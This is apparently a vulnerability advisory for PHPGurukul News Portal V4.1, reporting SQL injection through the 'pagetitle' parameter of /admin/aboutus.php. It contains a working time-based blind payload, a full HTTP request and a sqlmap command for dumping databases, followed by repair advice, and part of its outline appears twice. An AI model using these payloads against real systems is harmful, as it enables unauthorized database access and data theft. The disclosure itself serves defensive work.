PHPGurukul News Portal Project V4.1 /admin/aboutus.php SQL injection
NAME OF AFFECTED PRODUCT(S)
Vendor Homepage
AFFECTED AND/OR FIXED VERSION(S)
submitter
Vulnerable File
VERSION(S)
Software Link
PROBLEM TYPE
Vulnerability Type
Root Cause
- A SQL injection vulnerability was identified within the "/admin/aboutus.php" file of the "News Portal" project. The root cause lies in the fact that attackers can inject malicious code via the parameter "pagetitle". This input is then directly utilized in SQL queries without undergoing proper sanitization or validation processes. As a result, attackers are able to fabricate input values, manipulate SQL queries, and execute unauthorized operations.
Impact
- Exploiting this SQL injection vulnerability allows attackers to gain unauthorized access to the database, cause sensitive data leakage, tamper with data, gain complete control over the system, and even disrupt services. This poses a severe threat to both the security of the system and the continuity of business operations.
DESCRIPTION
- During the security assessment of "News Portal", I detected a critical SQL injection vulnerability in the "/admin/aboutus.php" file. This vulnerability is attributed to the insufficient validation of user input for the "pagetitle" parameter. This inadequacy enables attackers to inject malicious SQL queries. Consequently, attackers can access the database without proper authorization, modify or delete data, and obtain sensitive information. Immediate corrective actions are essential to safeguard system security and uphold data integrity.
No login or authorization is required to exploit this vulnerability
Vulnerability details and POC
Vulnerability location:
Payload:
Parameter: pagetitle (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: pagetitle=1' AND (SELECT 7186 FROM (SELECT(SLEEP(5)))RqtW) AND 'LrDS'='LrDS&pagedescription=<p><font color="#7b8898" face="Mercury SSm A, Mercury SSm B, Georgia, Times, Times New Roman, Microsoft YaHei New, Microsoft Yahei, %C3%A5%C2%BE%C2%AE%C3%A8%C2%BD%C2%AF%C3%A9%E2%80%BA%E2%80%A6%C3%A9%C2%BB%E2%80%98, %C3%A5%C2%AE%E2%80%B9%C3%A4%C2%BD%E2%80%9C, SimSun, STXihei, %C3%A5%C2%8D%C5%BD%C3%A6%E2%80%93%E2%80%A1%C3%A7%C2%BB%E2%80%A0%C3%A9%C2%BB%E2%80%98, serif"><span style="font-size: 26px;">1</span></font></p>&files=&update=
Vulnerability Request Packet
POST /News%20portal%20Project%20in%20PHP%20and%20MySQL/newsportal/admin/aboutus.php HTTP/1.1
Host: 172.20.10.4
Content-Length: 540
Cache-Control: max-age=0
Origin: http://172.20.10.4
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://172.20.10.4/News%20portal%20Project%20in%20PHP%20and%20MySQL/newsportal/admin/aboutus.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=1ac5499e93c6019ffff58a6495d0e6b5f0b2fab8%7Een; PHPSESSID=ijefj09htbmd77jpt89rtio9eo; _ctr=MTcyXzIwXzEwXzQuWlo%3D; nv4_cltz=480.480.480%257C%252F%257C; supports_rewrite=c298fda427532fdcb502f69ba7cb63d0; nv4_ctr=MTcyXzIwXzEwXzQuWlo%3D
Connection: keep-alive
pagetitle=1&pagedescription=%3Cp%3E%3Cfont+color%3D%22%237b8898%22+face%3D%22Mercury+SSm+A%2C+Mercury+SSm+B%2C+Georgia%2C+Times%2C+Times+New+Roman%2C+Microsoft+YaHei+New%2C+Microsoft+Yahei%2C+%C3%A5%C2%BE%C2%AE%C3%A8%C2%BD%C2%AF%C3%A9%E2%80%BA%E2%80%A6%C3%A9%C2%BB%E2%80%98%2C+%C3%A5%C2%AE%E2%80%B9%C3%A4%C2%BD%E2%80%9C%2C+SimSun%2C+STXihei%2C+%C3%A5%C2%8D%C5%BD%C3%A6%E2%80%93%E2%80%A1%C3%A7%C2%BB%E2%80%A0%C3%A9%C2%BB%E2%80%98%2C+serif%22%3E%3Cspan+style%3D%22font-size%3A+26px%3B%22%3E1%3C%2Fspan%3E%3C%2Ffont%3E%3C%2Fp%3E&files=&update=
The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
sqlmap.py -r request.txt --dbs --dbms=mysql
(sqlmap验证成功后的截图)
Suggested repair
-
Employ prepared statements and parameter binding:
Prepared statements serve as an effective safeguard against SQL injection as they segregate SQL code from user input data. When using prepared statements, user - entered values are treated as mere data and will not be misconstrued as SQL code.
-
Conduct input validation and filtering:
Rigorously validate and filter user input data to guarantee that it conforms to the expected format. This helps in blocking malicious input.
-
Minimize database user permissions:
Ensure that the account used to connect to the database has only the minimum required permissions. Avoid using accounts with elevated privileges (such as 'root' or 'admin') for day - to - day operations.
PHPGurukul News Portal Project V4.1 /admin/aboutus.php SQL injection
NAME OF AFFECTED PRODUCT(S)
Vendor Homepage
AFFECTED AND/OR FIXED VERSION(S)
submitter
Vulnerable File
VERSION(S)
Software Link
PROBLEM TYPE
Vulnerability Type
Root Cause
Impact
DESCRIPTION
No login or authorization is required to exploit this vulnerability
Vulnerability details and POC
Vulnerability location:
Payload:
Vulnerability Request Packet
The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
(sqlmap验证成功后的截图)
Suggested repair
Employ prepared statements and parameter binding:
Prepared statements serve as an effective safeguard against SQL injection as they segregate SQL code from user input data. When using prepared statements, user - entered values are treated as mere data and will not be misconstrued as SQL code.
Conduct input validation and filtering:
Rigorously validate and filter user input data to guarantee that it conforms to the expected format. This helps in blocking malicious input.
Minimize database user permissions:
Ensure that the account used to connect to the database has only the minimum required permissions. Avoid using accounts with elevated privileges (such as 'root' or 'admin') for day - to - day operations.